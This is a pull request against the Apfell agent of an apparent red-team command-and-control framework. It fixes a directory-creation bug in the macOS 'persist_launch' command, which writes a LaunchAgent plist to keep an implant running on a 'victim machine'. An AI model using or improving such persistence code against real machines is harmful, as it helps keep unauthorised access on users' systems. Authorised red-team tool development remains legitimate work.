### PR TITLE
Fix dir creation bug

### DIFF
--- a/Payload_Type/apfell/apfell/agent_code/persist_launch.js
+++ b/Payload_Type/apfell/apfell/agent_code/persist_launch.js
@@ -40,7 +40,7 @@ exports.persist_launch = function(task, command, params){
             path = $(path).stringByExpandingTildeInPath;
             var fileManager = $.NSFileManager.defaultManager;
             if(!fileManager.fileExistsAtPath(path)){
-                $.fileManager.createDirectoryAtPathWithIntermediateDirectoriesAttributesError(path, false, $(), $());
+                fileManager.createDirectoryAtPathWithIntermediateDirectoriesAttributesError(path, false, $(), $());
             }
             path = path.js + "/" + label + ".plist";
             response = write_data_to_file(template, path) + " to " + path;


### PR DESCRIPTION
Thanks for your hard work on cool open source software!

This small change fixes the `persist_launch` command when the victim machine does not have a `~/Library/LaunchAgents` folder.

The `createDirectoryAtPathWithIntermediateDirectoriesAttributesError` call is made on `$.fileManager`, which does not exist, instead of on the `fileManager` instance which was previously created.

In practice, trying to run the command would generate this error:

```
TypeError: undefined is not an object (evaluating '$.fileManager.createDirectoryAtPathWithIntermediateDirectoriesAttributesError')
```

This small change makes the command run successfully.